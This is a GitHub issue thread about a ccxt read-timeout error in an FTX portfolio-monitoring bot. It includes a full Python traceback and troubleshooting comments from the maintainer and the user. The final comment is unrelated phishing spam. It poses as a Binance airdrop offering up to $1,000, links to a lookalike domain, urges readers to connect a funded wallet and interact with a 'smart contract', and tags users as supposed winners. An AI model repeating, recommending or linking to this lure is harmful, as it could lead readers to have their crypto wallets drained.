### ISSUE TITLE
api ccxt read time out error 

### ISSUE THREAD

**Issue by vensilver** [PattoMotto/ftx-portfolio-monitoring#2]
the code stops running after some time some exception I think so 
```

 resp = conn.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen
    retries = retries.increment(
  File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 400, in increment
    raise six.reraise(type(error), error, _stacktrace)
  File "/usr/lib/python3/dist-packages/six.py", line 703, in reraise
    raise value
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
    httplib_response = self._make_request(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 423, in _make_request
    self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 330, in _raise_timeout
    raise ReadTimeoutError(
urllib3.exceptions.ReadTimeoutError: HTTPSConnectionPool(host='ftx.com', port=443): Read timed out. (read timeout=10)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/vensilver/.local/lib/python3.8/site-packages/ccxt/base/exchange.py", line 587, in fetch
    response = self.session.request(
  File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 530, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 643, in send
    r = adapter.send(request, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 529, in send
    raise ReadTimeout(e, request=request)
requests.exceptions.ReadTimeout: HTTPSConnectionPool(host='ftx.com', port=443): Read timed out. (read timeout=10)

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/vensilver/ftxp/pmPortfolioMonitoringBot.py", line 34, in loop
    wallets = {'main': self.getWalletData(self.mainExchangeClient)}
  File "/home/vensilver/ftxp/pmPortfolioMonitoringBot.py", line 73, in getWalletData
    data = exchangeClient.getWalletBalance()
  File "/home/vensilver/ftxp/exchangeClient.py", line 13, in getWalletBalance
    return self.exchange.fetch_balance()
  File "/home/vensilver/.local/lib/python3.8/site-packages/ccxt/ftx.py", line 960, in fetch_balance
    response = self.privateGetWalletBalances(params)
  File "/home/vensilver/.local/lib/python3.8/site-packages/ccxt/base/exchange.py", line 457, in inner
    return entry(_self, **inner_kwargs)
  File "/home/vensilver/.local/lib/python3.8/site-packages/ccxt/base/exchange.py", line 506, in request
    return self.fetch2(path, api, method, params, headers, body, config, context)
  File "/home/vensilver/.local/lib/python3.8/site-packages/ccxt/base/exchange.py", line 502, in fetch2
    return self.fetch(request['url'], request['method'], request['headers'], request['body'])
  File "/home/vensilver/.local/lib/python3.8/site-packages/ccxt/base/exchange.py", line 617, in fetch
    raise RequestTimeout(details) from e
ccxt.base.errors.RequestTimeout: ftx GET https://ftx.com/api/wallet/balances

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/vensilver/.local/lib/python3.8/site-packages/apscheduler/executors/base.py", line 125, in run_job
    retval = job.func(*job.args, **job.kwargs)
  File "/home/vensilver/ftxp/pmPortfolioMonitoringBot.py", line 68, in loop
    exc_type, exc_tb = sys.exc_info()
ValueError: too many values to unpack (expected 2)

```

**Comment by PattoMotto** [comment]
@vensilver does it keep showing timeout for multiple times?
Look like something wrong when trying to get your balance from main account

**Comment by vensilver** [comment]
> @vensilver does it keep showing timeout multiple times? Look like something is wrong when trying to get your balance from the main account

the first time it updates then after some time when the second job it failed to get the data.

**Comment by vensilver** [comment]
I am running the code in azure Linux VM with  tmux attach-session dos this cause problem when i detach the session.

**Comment by vensilver** [comment]
can I check it by changing your code from ccxt to ftx https://pypi.org/project/ftx/ will it work?

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @haptear, @layerlre, @kuljeetkasnia, @doubas, @mkantar, @flowman74, @mrbooshehri
